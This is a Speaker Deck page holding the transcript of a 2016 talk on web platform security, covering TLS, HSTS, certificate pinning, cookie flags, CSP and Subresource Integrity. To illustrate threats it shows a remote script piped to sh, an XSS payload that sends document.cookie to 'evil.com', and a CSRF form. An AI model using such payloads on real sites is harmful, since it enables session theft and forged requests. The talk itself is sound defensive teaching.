Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web Platform Security
Search
Jérémy Courtial
October 26, 2016
Programming
0
47
Web Platform Security
Jérémy Courtial
October 26, 2016
Tweet
Share
More Decks by Jérémy Courtial
See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
25
An introduction to AppSec?
mrartichaut
0
43
Secure by design: introduction to threat modeling
mrartichaut
0
51
Taming secrets with Vault
mrartichaut
0
84
Lead Tech: Empowering the team
mrartichaut
0
47
go doSomeThing()
mrartichaut
0
52
Practical Cryptography : Data Encryption
mrartichaut
0
61
Practical Cryptography : Password Hashing
mrartichaut
1
73
HTTP/2 : One connection to rule them all
mrartichaut
1
60
Other Decks in Programming
See All in Programming
TanStack DB ~状態管理の新しい考え方~
bmthd
2
410
MCPとデザインシステムに立脚したデザインと実装の融合
yukukotani
3
1k
TROCCO×dbtで実現する人にもAIにもやさしいデータ基盤
nealle
0
400
旅行プランAIエージェント開発の裏側
ippo012
1
600
Testing Trophyは叫ばない
toms74209200
0
200
UbieのAIパートナーを支えるコンテキストエンジニアリング実践
syucream
2
800
開発チーム・開発組織の設計改善スキルの向上
masuda220
PRO
18
9.6k
Ruby Parser progress report 2025
yui_knk
1
260
Zendeskのチケットを Amazon Bedrockで 解析した
ryokosuge
3
240
MLH State of the League: 2026 Season
theycallmeswift
0
210
CJK and Unicode From a PHP Committer
youkidearitai
PRO
0
100
Swift Updates - Learn Languages 2025
koher
1
260
Featured
See All Featured
A designer walks into a library…
pauljervisheath
207
24k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
284
13k
Building Better People: How to give real-time feedback that sticks.
wjessup
368
19k
Gamification - CAS2011
davidbonilla
81
5.4k
Why Our Code Smells
bkeepers
PRO
339
57k
YesSQL, Process and Tooling at Scale
rocio
173
14k
We Have a Design System, Now What?
morganepeng
53
7.8k
Navigating Team Friction
lara
189
15k
Statistics for Hackers
jakevdp
799
220k
A Modern Web Designer's Workflow
chriscoyier
696
190k
Being A Developer After 40
akosma
90
590k
A Tale of Four Properties
chriscoyier
160
23k
Transcript
Web Platform Security Leveling up Jérémy Courtial Software Security Architect
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin.
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Rootkit ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Malware ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Trojan ?
_______ : noun [c]. An application entirely dedicated to execute
unknown code from unknown origin. Browser /ˈbraʊ.zɚ/
http://yolo.com Go!
curl -s http://yolo.com | sh VS http://yolo.com Go!
Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from unknown origin.
Unknown origin
Unknown origin Unsecure
What is anyway ? www.google.com
What is anyway ? www.oodrive.com
What is anyway ? www.lol-cats.com
What is anyway ? 172.217.20.46
Unsecure origin
Unsecure origin
Transport Layer Security
Confidentiality Integrity Authentication
Other incentives "The green lock™"
Other incentives HTTP/2
Other incentives "Secure origins only" features
http https
GET /
GET / 302 Found Location: https://yolo.com
GET / 302 Found Location: https://yolo.com
None
None
302 Found
302 Found
302 Found
HTTP Strict Transport Security
Strict-Transport-Security :
max-age=31536000; Strict-Transport-Security :
includeSubdomains; max-age=31536000; Strict-Transport-Security :
http://yolo.com
http://yolo.com 307 Internal Redirect
https://yolo.com 307 Internal Redirect
307 Internal Redirect GET / https://yolo.com
Trust failure
TLS certificates are based on trust
Oh… trust … That's cute …
Trust-based systems don't have a good reliability record …
Certificate Authority failures Bad captive portal Every "Internal CA"
You've failed me for the last time
HTTP Certificate Pinning
Public-Key-Pins:
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";
Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.
Unknown code
XSS <h1>Hello, ${username}</h1>
XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"
XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>
CSRF https://evil.com Click here!
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post
<input value="I ❤ Justin Bieber" name="message" type="hidden">
Everybody love cookies !
Rename Cookie to Spinach ?
Rename Cookie to Spinach ? Brussel Sprout ?
REJECTED
Locking the cookie jar
Set-Cookie : JSESSIONID=12345;
Set-Cookie : JSESSIONID=12345; secure;
Set-Cookie : JSESSIONID=12345; secure; HttpOnly;
Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;
Content Security Policy
Content-Security-Policy
: default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src
… ; connect-src …; Content-Security-Policy
: … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy
Our data (cookies, assets) are locked. What about third parties
?
HTML JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
CDN HTML JS JPG JS JPG
Subresource Integrity
<script src="https://example.com/framework.js" > </script>
<script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser unknown code
_______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to
execute unknown code from secured origins Browser trusted code
Many more Suborigins iframe sandboxing Credentials Management
https://www.w3.org/2011/webappsec/ @mikewest
Times have changed
Times have changed "secured" is the new default secured
What does secured means ? secured Least Privilege Authentication Integrity
Is our platform ? secured
Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,
unlimicon (The Noun Project) and design.google.com/icons/